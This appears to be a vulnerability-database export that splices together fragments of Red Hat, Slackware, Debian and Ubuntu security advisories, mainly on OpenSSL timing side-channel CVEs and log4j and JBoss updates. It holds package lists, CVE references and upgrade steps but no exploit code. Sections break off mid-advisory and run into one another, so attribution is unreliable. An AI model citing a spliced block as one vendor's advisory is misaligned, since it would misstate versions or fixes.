JBEAP-23038 - (7.4.z) Upgrade galleon-plugins from 5.1.4.Final to 5.2.6.Final
JBEAP-23040 - (7.4.z) Upgrade galleon-plugins in wildfly-core-eap from 5.1.4.Final to 5.2.6.Final
JBEAP-23045 - (7.4.z) Upgrade Undertow from 2.2.13.SP2-redhat-00001 to 2.2.16.Final-redhat-0001
JBEAP-23101 - (7.4.z) Upgrade Infinispan from 11.0.12.Final to 11.0.15.Final
JBEAP-23105 - (7.4.z) Upgrade Narayana from 5.11.3.Final-redhat-00001 to 5.11.4.Final-redhat-00001
JBEAP-23143 - (7.4.z) Upgrade from org.eclipse.jdt.core.compiler:ecj:4.6.1 to org.eclipse.jdt:ecj:3.26
JBEAP-23177 - (7.4.z) Upgrade XNIO from 3.8.5.SP1-redhat-00001 to 3.8.6.Final-redhat-00001
JBEAP-23323 - [GSS](7.4.z) WFLY-16112 - Batch JobOperatorService should look for only active job names to stop during suspend
JBEAP-23373 - (7.4.z) Upgrade OpenSSL from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002
JBEAP-23374 - (7.4.z) Upgrade WildFly Core from 15.0.7.Final-redhat-00001 to 15.0.8.Final-redhat-00001
JBEAP-23375 - (7.4.z) Upgrade OpenSSL Natives from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002
7. Package List:
Red Hat JBoss EAP 7.4 for RHEL 8:
Source:
eap7-activemq-artemis-2.16.0-7.redhat_00034.1.el8eap.src.rpm
eap7-ecj-3.26.0-1.redhat_00002.1.el8eap.src.rpm
eap7-hal-console-3.3.9-1.Final_redhat_00001.1.el8eap.src.rpm
eap7-hibernate-5.3.25-1.Final_redhat_00002.1.el8eap.src.rpm
eap7-infinispan-11.0.15-1.Final_redhat_00001.1.el8eap.src.rpm
eap7-jboss-server-migration-1.10.0-15.Final_redhat_00014.1.el8eap.src.rpm
eap7-jboss-vfs-3.2.16-1.Final_redhat_00001.1.el8eap.src.rpm
eap7-jboss-xnio-base-3.8.6-1.Final_redhat_00001.1.el8eap.src.rpm
eap7-jbossws-cxf-5.4.4-1.Final_redhat_00001.1.el8eap.src.rpm
eap7-log4j-2.17.1-1.redhat_00001.1.el8eap.src.rpm
eap7-narayana-5.11.4-1.Final_redhat_00001.1.el8eap.src.rpm
eap7-objectweb-asm-9.1.0-1.redhat_00002.1.el8eap.src.rpm
eap7-undertow-2.2.16-1.Final_redhat_00001.1.el8eap.src.rpm
eap7-wildfly-7.4.4-3.GA_redhat_00011.1.el8eap.src.rpm
eap7-wildfly-elytron-1.15.11-1.Final_redhat_00002.1.el8eap.src.rpm
eap7-wildfly-openssl-2.2.0-3.Final_redhat_00002.1.el8eap.src.rpm
eap7-wildfly-openssl-el8-x86_64-2.2.0-2.Final_redhat_00002.1.el8eap.src.rpm
eap7-xom-1.3.7-1.redhat_00001.1.el8eap.src.rpm
eap7-yasson-1.0.10-1.redhat_00001.1.el8eap.src.rpm
noarch:
eap7-activemq-artemis-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm
eap7-activemq-artemis-cli-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm
eap7-activemq-artemis-commons-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm
eap7-activemq-artemis-core-client-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm
eap7-activemq-artemis-dto-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm
eap7-activemq-artemis-hornetq-protocol-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm
eap7-activemq-artemis-hqclient-protocol-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm
eap7-activemq-artemis-jdbc-store-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm
eap7-activemq-artemis-jms-client-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm
eap7-activemq-artemis-jms-server-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm
eap7-activemq-artemis-journal-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm
eap7-activemq-artemis-ra-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm
eap7-activemq-artemis-selector-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm
eap7-activemq-artemis-server-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm
eap7-activemq-artemis-service-extensions-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm
eap7-activemq-artemis-tools-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm
eap7-ecj-3.26.0-1.redhat_00002.1.el8eap.noarch.rpm
eap7-hal-console-3.3.9-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-hibernate-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm
eap7-hibernate-core-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm
eap7-hibernate-entitymanager-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm
eap7-hibernate-envers-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm
eap7-hibernate-java8-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm
eap7-infinispan-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-infinispan-cachestore-jdbc-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-infinispan-cachestore-remote-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-infinispan-client-hotrod-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-infinispan-commons-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-infinispan-component-annotations-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-infinispan-core-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-infinispan-hibernate-cache-commons-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-infinispan-hibernate-cache-spi-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-infinispan-hibernate-cache-v53-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-jboss-server-migration-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm
eap7-jboss-server-migration-cli-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm
eap7-jboss-server-migration-core-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm
eap7-jboss-vfs-3.2.16-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-jboss-xnio-base-3.8.6-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-jbossws-cxf-5.4.4-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-log4j-2.17.1-1.redhat_00001.1.el8eap.noarch.rpm
eap7-narayana-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-narayana-compensations-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-narayana-jbosstxbridge-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-narayana-jbossxts-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-narayana-jts-idlj-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-narayana-jts-integration-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-narayana-restat-api-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-narayana-restat-bridge-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-narayana-restat-integration-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-narayana-restat-util-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-narayana-txframework-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-objectweb-asm-9.1.0-1.redhat_00002.1.el8eap.noarch.rpm
eap7-undertow-2.2.16-1.Final_redhat_00001.1.el8eap.noarch.rpm
eap7-wildfly-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm
eap7-wildfly-elytron-1.15.11-1.Final_redhat_00002.1.el8eap.noarch.rpm
eap7-wildfly-elytron-tool-1.15.11-1.Final_redhat_00002.1.el8eap.noarch.rpm
eap7-wildfly-javadocs-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm
eap7-wildfly-modules-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm
eap7-wildfly-openssl-2.2.0-3.Final_redhat_00002.1.el8eap.noarch.rpm
eap7-wildfly-openssl-java-2.2.0-3.Final_redhat_00002.1.el8eap.noarch.rpm
eap7-xom-1.3.7-1.redhat_00001.1.el8eap.noarch.rpm
eap7-yasson-1.0.10-1.redhat_00001.1.el8eap.noarch.rpm
x86_64:
eap7-wildfly-openssl-el8-x86_64-2.2.0-2.Final_redhat_00002.1.el8eap.x86_64.rpm
eap7-wildfly-openssl-el8-x86_64-debuginfo-2.2.0-2.Final_redhat_00002.1.el8eap.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
8. References:
https://access.redhat.com/security/cve/CVE-2021-4104
https://access.redhat.com/security/cve/CVE-2021-44832
https://access.redhat.com/security/cve/CVE-2021-45046
https://access.redhat.com/security/cve/CVE-2021-45105
https://access.redhat.com/security/cve/CVE-2022-23302
https://access.redhat.com/security/cve/CVE-2022-23305
https://access.redhat.com/security/cve/CVE-2022-23307
https://access.redhat.com/security/updates/classification/#low
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/
9. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBYlRUqtzjgjWX9erEAQhXfxAApQ6HkBUo8Tg+GWEosSpAx0AEsVPMojWK
HU3uJRF8jp0KXqchc+KVlalBJAWHPBUDr4xBpsISqwr7T/9iYonKlo4ijA/68b2K
khbFyt6o6i2dXrYygT5fcMtukSjN2T/hfCc2ZE2yiHTO3Ou4AALyZ2xCyYtfSpuZ
rZLVvgCWrnak2msgkoNl0/sZxnjw6b+ZJczKkq3QqPVWOYlV/Qdl5NGy16i0rbEo
P1rWXJrOUlEBctJEs756cqeIJesYKHZqqPx/kHaNyzdxDh99hKGZx7oturscAN6e
sPfSSdyd5jsOcWD7UlHV9ukoPQxf1ouVBa0qkpL0wCoR3GFF6Pls1bMEFzUoz3/R
IwagVxsr38duK3isv34l6IQ+RP0oSWN0rgPUu69tAlEV+YwLgA5JUOpz1i7FTmXt
l3i5+wMlo9Xc/Hy+j7unW8Do7s/i0YuFVTuM6H9KEITuFjgFA2tB9CpzoAFzWLk0
U8zCL80Rwy1wiMydSrLjtg3YUPB6ibh2NJ02O7R+bNhJ8bN4yuDuWkDqy4VdPXGp
zhed3dZmYAXD9/x+mnfghcbJZwigzGT9Qv78zYafB3f8K7cEVEDJK3aZMOkkh9ca
dcaLs5WRv8ZTytFPv+KGKRJ/cc/UHAvh8zumMZdVMp1oty/k/OYWhgaEJMWGQDCe
UnHI/WwB37w=
=eCh2
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
. JIRA issues fixed (https://issues.jboss.org/):
LOG-2089 - resourceVersion is overflowing type Integer causing ES rejection [openshift-logging 5.0]
6.
All OpenShift Container Platform 4.7 users are advised to upgrade to these
updated packages and images when they are available in the appropriate
release channel. To check for available updates, use the OpenShift Console
or the CLI oc command. Instructions for upgrading a cluster are available
at
https://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html
3. Solution:
For OpenShift Container Platform 4.7 see the following documentation, which
will be updated shortly for this release, for important instructions on how
to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html
Details on how to access this content are available at
https://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html
4. Bugs fixed (https://bugzilla.redhat.com/):
2035951 - CVE-2021-44832 log4j-core: remote code execution via JDBC Appender
5 |
|
var-201810-0932
|
The OpenSSL DSA signature algorithm has been shown to be vulnerable to a timing side channel attack. An attacker could use variations in the signing algorithm to recover the private key. Fixed in OpenSSL 1.1.1a (Affected 1.1.1). Fixed in OpenSSL 1.1.0j (Affected 1.1.0-1.1.0i). Fixed in OpenSSL 1.0.2q (Affected 1.0.2-1.0.2p). The product supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, secure hash algorithms, etc. The vulnerability stems from incorrect use of relevant cryptographic algorithms by network systems or products, resulting in improperly encrypted content, weak encryption, and storing sensitive information in plain text.
Here are the details from the Slackware 14.2 ChangeLog:
+--------------------------+
patches/packages/openssl-1.0.2q-i586-1_slack14.2.txz: Upgraded.
For more information, see:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5407
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0734
(* Security fix *)
patches/packages/openssl-solibs-1.0.2q-i586-1_slack14.2.txz: Upgraded.
+--------------------------+
Where to find the new packages:
+-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.
Updated packages for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1u-i486-1_slack14.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1u-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1u-x86_64-1_slack14.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1u-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1u-i486-1_slack14.1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1u-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1u-x86_64-1_slack14.1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1u-x86_64-1_slack14.1.txz
Updated packages for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssl-1.0.2q-i586-1_slack14.2.txz
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssl-solibs-1.0.2q-i586-1_slack14.2.txz
Updated packages for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssl-1.0.2q-x86_64-1_slack14.2.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssl-solibs-1.0.2q-x86_64-1_slack14.2.txz
Updated packages for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.1.1a-i586-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.1.1a-i586-1.txz
Updated packages for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.1.1a-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.1.1a-x86_64-1.txz
MD5 signatures:
+-------------+
Slackware 14.0 packages:
e6d4b3a76383f9f253da4128ba23f269 openssl-1.0.1u-i486-1_slack14.0.txz
c61d31a1751ae39af89d3fee0b54f0d8 openssl-solibs-1.0.1u-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages:
96be19e6a96c9beb5d3bbc55348fb483 openssl-1.0.1u-x86_64-1_slack14.0.txz
b7a8fa2ebd16c8ae106fc1267bc29eca openssl-solibs-1.0.1u-x86_64-1_slack14.0.txz
Slackware 14.1 packages:
099b960e62eaea5d1a639a61a2fabca7 openssl-1.0.1u-i486-1_slack14.1.txz
b5d5219e05db97f63c4d6c389d6884fb openssl-solibs-1.0.1u-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages:
fc96c87d76c9d1efd1290ac847fa7c7c openssl-1.0.1u-x86_64-1_slack14.1.txz
e873b66f84f45ea34d028a3d524ce573 openssl-solibs-1.0.1u-x86_64-1_slack14.1.txz
Slackware 14.2 packages:
d5f0cc19451e9c7e3967820cf02a20c6 openssl-1.0.2q-i586-1_slack14.2.txz
594ca80447baecd608a51083b12a26d9 openssl-solibs-1.0.2q-i586-1_slack14.2.txz
Slackware x86_64 14.2 packages:
943bb2f3259ccf97a1b8b25f5f511c30 openssl-1.0.2q-x86_64-1_slack14.2.txz
0d45afe2487c47b283c06902c56e4559 openssl-solibs-1.0.2q-x86_64-1_slack14.2.txz
Slackware -current packages:
6f01f6dd0f40a12e473320386cfc8536 a/openssl-solibs-1.1.1a-i586-1.txz
6e5a2ab2475a0d851376d12911b3c6b7 n/openssl-1.1.1a-i586-1.txz
Slackware x86_64 -current packages:
eb4697703f1f4b81ad38e9247ab70dac a/openssl-solibs-1.1.1a-x86_64-1.txz
12a10fd6bd2344b3e73106c8d5b9828c n/openssl-1.1.1a-x86_64-1.txz
Installation instructions:
+------------------------+
Upgrade the packages as root:
# upgradepkg openssl-1.0.2q-i586-1_slack14.2.txz openssl-solibs-1.0.2q-i586-1_slack14.2.txz
+-----+
Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com
+------------------------------------------------------------------------+
| To leave the slackware-security mailing list: |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message: |
| |
| unsubscribe slackware-security |
| |
| You will get a confirmation message back containing instructions to |
| complete the process. Please do not reply to this email address. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied. Description:
This release adds the new Apache HTTP Server 2.4.37 packages that are part
of the JBoss Core Services offering.
This release serves as a replacement for Red Hat JBoss Core Services Pack
Apache Server 2.4.29 and includes bug fixes and enhancements. After installing the updated
packages, the httpd daemon will be restarted automatically. Bugs fixed (https://bugzilla.redhat.com/):
1568253 - CVE-2018-0737 openssl: RSA key generation cache timing vulnerability in crypto/rsa/rsa_gen.c allows attackers to recover private keys
1644364 - CVE-2018-0734 openssl: timing side channel attack in the DSA signature algorithm
1645695 - CVE-2018-5407 openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures (PortSmash)
1668493 - CVE-2018-17199 httpd: mod_session_cookie does not respect expiry time
1668497 - CVE-2018-17189 httpd: mod_http2: DoS via slow, unneeded request bodies
1695020 - CVE-2019-0217 httpd: mod_auth_digest: access control bypass due to race condition
1695030 - CVE-2019-0196 httpd: mod_http2: read-after-free on a string compare
1695042 - CVE-2019-0197 httpd: mod_http2: possible crash on late upgrade
1735741 - CVE-2019-9513 HTTP/2: flood using PRIORITY frames results in excessive resource consumption
1741860 - CVE-2019-9511 HTTP/2: large amount of data requests leads to denial of service
1741864 - CVE-2019-9516 HTTP/2: 0-length headers lead to denial of service
1741868 - CVE-2019-9517 HTTP/2: request for large response leads to denial of service
6.
For the stable distribution (stretch), these problems have been fixed in
version 1.1.0j-1~deb9u1. Going forward, openssl security updates for
stretch will be based on the 1.1.0x upstream releases.
For the detailed security status of openssl please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/openssl
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlwBuAcACgkQEMKTtsN8
TjZbBw/+MOB5+pZbCHHXyH3IeD+yj+tSPvmNc3SCwdEtUxGXr0ZX7TKHfaLs/8s6
Udto0K8a1FvjrcUQCfhnFpNcSAv9pxX13Fr6Pd560miIfAu9/5jAqiCufCoiz+xj
45LNJGlaxxaFjgBGCitZSJA0Fc4SM6v5XFyJfR3kChdQ/3kGQbbMNAp16Fy3ZsxJ
VXwviomUxmmmdvjxyhifTIpuwr9OiJSQ+13etQjTDQ3pzSbLBPSOxmpV0vPIC7I2
Dwa4zuQXA/DF4G6l8T4rXCwCN4e4pwbTc8bbCjXeZK+iVAhnRD6wXlS3cc5IVAzx
/qTa89LZU8B6ylcB6nodeAHLuZTC3Le8ndoxYz5S2/jHZMM/jCQNHYJemHWNbOqn
q+e5W0D1fIVLiLoL/iHW5XhN6yJY2Ma7zjXMRBnkzJA9CTNIKgUjrSFz0Ud+wIM/
u8QhNPwZ0hPd5IfSgIyWqmuQ5XzFYqAQvwT1gUJiK7tIvuT0VsSyKVaSZVbi4yrM
9sxkZaP1UNLcTVCFw6A0KFwhb9z6kQtyH1MRkFPphmnb8jlHA3cTdPJkFUBi3VaT
7izThm5/mVLbAjZ8X7nkqnzWzmc885j0ml3slDd/MOVWB5CD3vFAcI8k3VZr3A61
P2gNSN6UbAbLMGsxgs3hYUHgazi7MdXJ/aNavjGSbYBNL780Iaw=3Qji
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Low: openssl security, bug fix, and enhancement update
Advisory ID: RHSA-2019:3700-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2019:3700
Issue date: 2019-11-05
CVE Names: CVE-2018-0734 CVE-2018-0735 CVE-2019-1543
=====================================================================
1. Summary:
An update for openssl is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact
of Low. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64
3. Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and
Transport Layer Security (TLS) protocols, as well as a full-strength
general-purpose cryptography library.
The following packages have been upgraded to a later upstream version:
openssl (1.1.1c).
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Enterprise Linux 8.1 Release Notes linked from the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library
must be restarted, or the system rebooted.
5. Bugs fixed (https://bugzilla.redhat.com/):
1644356 - CVE-2018-0735 openssl: timing side channel attack in the ECDSA signature generation
1644364 - CVE-2018-0734 openssl: timing side channel attack in the DSA signature algorithm
1668880 - ec man page lists -modulus but the tool doesn't support it
1686058 - specifying digest for signing time-stamping responses is mandatory
1686548 - Incorrect handling of fragmented KeyUpdate messages
1695954 - CVE-2019-1543 openssl: ChaCha20-Poly1305 with long nonces
1697915 - Race/segmentation fault on process shutdown in OpenSSL
1706104 - openssl asn1parse crashes with double free or corruption (!prev)
1706915 - OpenSSL should implement continuous random test or use the kernel AF_ALG interface for random
1712023 - openssl pkcs12 uses certpbe algorithm not compliant with FIPS by default
1714245 - DSA ciphers in TLS don't work with SHA-1 signatures even in LEGACY level
6. Package List:
Red Hat Enterprise Linux BaseOS (v. 8):
Source:
openssl-1.1.1c-2.el8.src.rpm
aarch64:
openssl-1.1.1c-2.el8.aarch64.rpm
openssl-debuginfo-1.1.1c-2.el8.aarch64.rpm
openssl-debugsource-1.1.1c-2.el8.aarch64.rpm
openssl-devel-1.1.1c-2.el8.aarch64.rpm
openssl-libs-1.1.1c-2.el8.aarch64.rpm
openssl-libs-debuginfo-1.1.1c-2.el8.aarch64.rpm
openssl-perl-1.1.1c-2.el8.aarch64.rpm
ppc64le:
openssl-1.1.1c-2.el8.ppc64le.rpm
openssl-debuginfo-1.1.1c-2.el8.ppc64le.rpm
openssl-debugsource-1.1.1c-2.el8.ppc64le.rpm
openssl-devel-1.1.1c-2.el8.ppc64le.rpm
openssl-libs-1.1.1c-2.el8.ppc64le.rpm
openssl-libs-debuginfo-1.1.1c-2.el8.ppc64le.rpm
openssl-perl-1.1.1c-2.el8.ppc64le.rpm
s390x:
openssl-1.1.1c-2.el8.s390x.rpm
openssl-debuginfo-1.1.1c-2.el8.s390x.rpm
openssl-debugsource-1.1.1c-2.el8.s390x.rpm
openssl-devel-1.1.1c-2.el8.s390x.rpm
openssl-libs-1.1.1c-2.el8.s390x.rpm
openssl-libs-debuginfo-1.1.1c-2.el8.s390x.rpm
openssl-perl-1.1.1c-2.el8.s390x.rpm
x86_64:
openssl-1.1.1c-2.el8.x86_64.rpm
openssl-debuginfo-1.1.1c-2.el8.i686.rpm
openssl-debuginfo-1.1.1c-2.el8.x86_64.rpm
openssl-debugsource-1.1.1c-2.el8.i686.rpm
openssl-debugsource-1.1.1c-2.el8.x86_64.rpm
openssl-devel-1.1.1c-2.el8.i686.rpm
openssl-devel-1.1.1c-2.el8.x86_64.rpm
openssl-libs-1.1.1c-2.el8.i686.rpm
openssl-libs-1.1.1c-2.el8.x86_64.rpm
openssl-libs-debuginfo-1.1.1c-2.el8.i686.rpm
openssl-libs-debuginfo-1.1.1c-2.el8.x86_64.rpm
openssl-perl-1.1.1c-2.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2018-0734
https://access.redhat.com/security/cve/CVE-2018-0735
https://access.redhat.com/security/cve/CVE-2019-1543
https://access.redhat.com/security/updates/classification/#low
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.1_release_notes/
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBXcHzTdzjgjWX9erEAQjP6w/8D4eIfwgPbpKXdy3Y2kjmKhb9faqBJvHm
eqpG5tewJQBtRAPm/R7SesrMVKGUEDAuiSKydQlQn8nuRIWDsKw14+uLRN7AyTQ3
jXy0pnp+C7O1hyJnwNEiXo9ZgUaXMMXLGyTk8v9gnzA/HYpZX1c4g4FXHf0ycBi/
thxllEiJx6CrEO3pszYzu1Lt9GFMOAJPvwbiW0S7mVmsNCI4n+5OfeNzmURXdObs
89/XCFrQO3CDAh3SXCZa08Ie8px7Aq8slmNWOswhlqIYkUWGUbICIpqW1+4XyAqz
hVP8iqTY7TRwBPB0zoqmO5cxMY+jqMk/LphG+oTOF+ZA7YZH3bjDxJisCOr+ys+i
WnTYAl1KFBqo5uhH4dBzNH2EE5PeiwKNKqu6Wws1qOblTFXb3AYSHsqLv6VB0m1B
MXcUXrjSMwelSVAgK1eekJsYqCr3lT1+N8cA8P/sgT/DzGTNJhcoCE/OeJCUVBZL
uGhke48CUs3GvXCKP0+PDpINRRllGwVqkkCQ7LtsXoB0hGaaGt+CNCd3aQj8rf02
mPi2Vab7CjBLUn1QGiNigLF4X4rKZlxiBcHDByyHdeCW+zHvGod7ksmJKXmHujvY
pdg6toj/our0hhQp2dPTXFPKFtkO7GIIe19i+OZ6Rn0niVxSQbshiXyFFsvgZN0F
82vSbeKouJA=
=mdzd
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ==========================================================================
Ubuntu Security Notice USN-3840-1
December 06, 2018
openssl, openssl1.0 vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 18.10
- Ubuntu 18.04 LTS
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
Summary:
Several security issues were fixed in OpenSSL. (CVE-2018-0734)
Samuel Weiser discovered that OpenSSL incorrectly handled ECDSA signing. This issue only affected Ubuntu
18.04 LTS and Ubuntu 18.10. (CVE-2018-0735)
Billy Bob Brumley, Cesar Pereida Garcia, Sohaib ul Hassan, Nicola Tuveri,
and Alejandro Cabrera Aldaya discovered that Simultaneous Multithreading
(SMT) architectures are vulnerable to side-channel leakage. This issue is
known as "PortSmash". (CVE-2018-5407)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 18.10:
libssl1.0.0 1.0.2n-1ubuntu6.1
libssl1.1 1.1.1-1ubuntu2.1
Ubuntu 18.04 LTS:
libssl1.0.0 1.0.2n-1ubuntu5.2
libssl1.1 1.1.0g-2ubuntu4.3
Ubuntu 16.04 LTS:
libssl1.0.0 1.0.2g-1ubuntu4.14
Ubuntu 14.04 LTS:
libssl1.0.0 1.0.1f-1ubuntu2.27
After a standard system update you need to reboot your computer to make
all the necessary changes.
Due to the low severity of this issue we are not issuing a new release
of OpenSSL 1.1.1, 1.1.0 or 1.0.2 at this time. The fix is also available in commit 8abfe72e8c (for 1.1.1),
ef11e19d13 (for 1.1.0) and commit 43e6a58d49 (for 1.0.2) in the OpenSSL
git repository.
As a result of the changes made to mitigate this vulnerability, a new
side channel attack was created. The mitigation for this new vulnerability
can be found in these commits: 6039651c43 (for 1.1.1), 26d7fce13d (for 1.1.0)
and 880d1c76ed (for 1.0.2)
References
==========
URL for this Security Advisory:
https://www.openssl.org/news/secadv/20181030.txt
Note: the online version of the advisory may be updated with additional details
over time.
For details of OpenSSL severity classifications please see:
https://www.openssl.org/policies/secpolicy.html
|
|
var-201210-0063
|
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2012-1533. (DoS) An attack may be carried out.
